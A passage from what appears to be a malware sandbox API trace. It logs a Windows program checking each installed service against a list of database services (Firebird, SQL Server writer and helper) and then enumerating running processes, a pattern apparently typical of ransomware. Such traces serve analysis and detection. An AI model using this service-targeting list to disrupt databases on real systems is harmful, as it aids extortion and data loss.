(lpString="DcomLaunch") returned 10 [0053.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.908] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0053.908] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0053.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0053.908] lstrlenW (lpString="DeviceAssociationService") returned 24 [0053.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0053.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0053.908] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0053.908] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0053.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0053.908] lstrlenW (lpString="Dhcp") returned 4 [0053.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0053.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0053.908] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0053.908] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0053.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0053.908] lstrlenW (lpString="Dnscache") returned 8 [0053.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0053.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0053.908] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0053.908] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0053.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0053.908] lstrlenW (lpString="DoSvc") returned 5 [0053.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0053.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0053.908] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0053.908] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0053.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0053.908] lstrlenW (lpString="DPS") returned 3 [0053.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0053.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0053.908] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0053.908] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0053.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0053.909] lstrlenW (lpString="DusmSvc") returned 7 [0053.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0053.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0053.909] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0053.909] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0053.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0053.909] lstrlenW (lpString="EventLog") returned 8 [0053.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0053.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0053.909] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0053.909] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0053.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0053.909] lstrlenW (lpString="EventSystem") returned 11 [0053.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0053.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0053.909] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0053.909] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0053.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0053.909] lstrlenW (lpString="FontCache") returned 9 [0053.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0053.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0053.909] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0053.909] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0053.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0053.909] lstrlenW (lpString="gpsvc") returned 5 [0053.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0053.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0053.909] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0053.909] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0053.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0053.909] lstrlenW (lpString="iphlpsvc") returned 8 [0053.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.909] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0053.909] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0053.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0053.909] lstrlenW (lpString="KeyIso") returned 6 [0053.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0053.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0053.909] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0053.909] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0053.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0053.910] lstrlenW (lpString="LanmanServer") returned 12 [0053.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0053.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0053.910] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0053.910] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0053.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0053.910] lstrlenW (lpString="LanmanWorkstation") returned 17 [0053.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.910] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0053.910] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0053.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0053.910] lstrlenW (lpString="lfsvc") returned 5 [0053.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0053.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0053.910] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0053.910] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0053.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0053.910] lstrlenW (lpString="lmhosts") returned 7 [0053.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0053.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0053.910] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0053.910] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0053.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0053.910] lstrlenW (lpString="LSM") returned 3 [0053.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0053.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0053.910] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0053.910] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0053.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0053.910] lstrlenW (lpString="MpsSvc") returned 6 [0053.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0053.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0053.910] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0053.910] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0053.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0053.910] lstrlenW (lpString="NcbService") returned 10 [0053.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0053.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0053.910] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0053.910] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0053.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0053.911] lstrlenW (lpString="netprofm") returned 8 [0053.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0053.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0053.911] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0053.911] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0053.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0053.911] lstrlenW (lpString="NlaSvc") returned 6 [0053.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0053.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0053.911] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0053.911] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0053.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0053.911] lstrlenW (lpString="nsi") returned 3 [0053.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0053.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0053.911] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0053.911] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0053.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0053.911] lstrlenW (lpString="PcaSvc") returned 6 [0053.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0053.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0053.911] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0053.911] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0053.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0053.911] lstrlenW (lpString="PlugPlay") returned 8 [0053.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0053.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0053.911] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0053.911] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0053.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0053.911] lstrlenW (lpString="Power") returned 5 [0053.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0053.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0053.911] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0053.911] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0053.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0053.911] lstrlenW (lpString="ProfSvc") returned 7 [0053.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0053.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0053.911] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0053.912] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0053.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0053.912] lstrlenW (lpString="RpcEptMapper") returned 12 [0053.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.912] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0053.912] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0053.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0053.912] lstrlenW (lpString="RpcSs") returned 5 [0053.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0053.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0053.912] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0053.912] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0053.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0053.912] lstrlenW (lpString="SamSs") returned 5 [0053.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0053.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0053.912] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0053.912] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0053.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0053.912] lstrlenW (lpString="Schedule") returned 8 [0053.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0053.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0053.912] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0053.912] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0053.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0053.912] lstrlenW (lpString="SecurityHealthService") returned 21 [0053.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0053.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0053.912] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0053.912] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0053.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0053.912] lstrlenW (lpString="SENS") returned 4 [0053.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0053.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0053.912] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0053.912] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0053.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0053.912] lstrlenW (lpString="ShellHWDetection") returned 16 [0053.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.913] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0053.913] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0053.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0053.913] lstrlenW (lpString="Spooler") returned 7 [0053.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0053.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0053.913] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0053.913] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0053.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0053.913] lstrlenW (lpString="SSDPSRV") returned 7 [0053.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0053.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0053.913] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0053.913] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0053.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0053.913] lstrlenW (lpString="StateRepository") returned 15 [0053.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0053.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0053.913] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0053.913] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0053.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0053.913] lstrlenW (lpString="SysMain") returned 7 [0053.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0053.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0053.913] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0053.913] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0053.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0053.913] lstrlenW (lpString="SystemEventsBroker") returned 18 [0053.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0053.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0053.913] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0053.913] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0053.913] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x636198 | out: hHeap=0x5d0000) returned 1 [0053.913] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2c4 [0053.916] Process32FirstW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0053.917] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0053.918] lstrlenW (lpString="System") returned 6 [0053.918] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0053.918] lstrlenW (lpString="smss.exe") returned 8 [0053.918] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.920] lstrlenW (lpString="csrss.exe") returned 9 [0053.920] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0053.920] lstrlenW (lpString="wininit.exe") returned 11 [0053.920] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.921] lstrlenW (lpString="csrss.exe") returned 9 [0053.921] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0053.922] lstrlenW (lpString="winlogon.exe") returned 12 [0053.922] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0053.922] lstrlenW (lpString="services.exe") returned 12 [0053.922] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0053.923] lstrlenW (lpString="lsass.exe") returned 9 [0053.923] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.924] lstrlenW (lpString="svchost.exe") returned 11 [0053.924] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0053.924] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0053.924] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0053.925] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0053.925] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.926] lstrlenW (lpString="svchost.exe") returned 11 [0053.926] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0053.926] lstrlenW (lpString="dwm.exe") returned 7 [0053.926] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.927] lstrlenW (lpString="svchost.exe") returned 11 [0053.927] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.928] lstrlenW (lpString="svchost.exe") returned 11 [0053.928] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.928] lstrlenW (lpString="svchost.exe") returned 11 [0053.928] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.929] lstrlenW (lpString="svchost.exe") returned 11 [0053.929] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.930] lstrlenW (lpString="svchost.exe") returned 11 [0053.930] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.930] lstrlenW (lpString="svchost.exe") returned 11 [0053.930] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.931] lstrlenW (lpString="svchost.exe") returned 11 [0053.931] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.932] lstrlenW (lpString="svchost.exe") 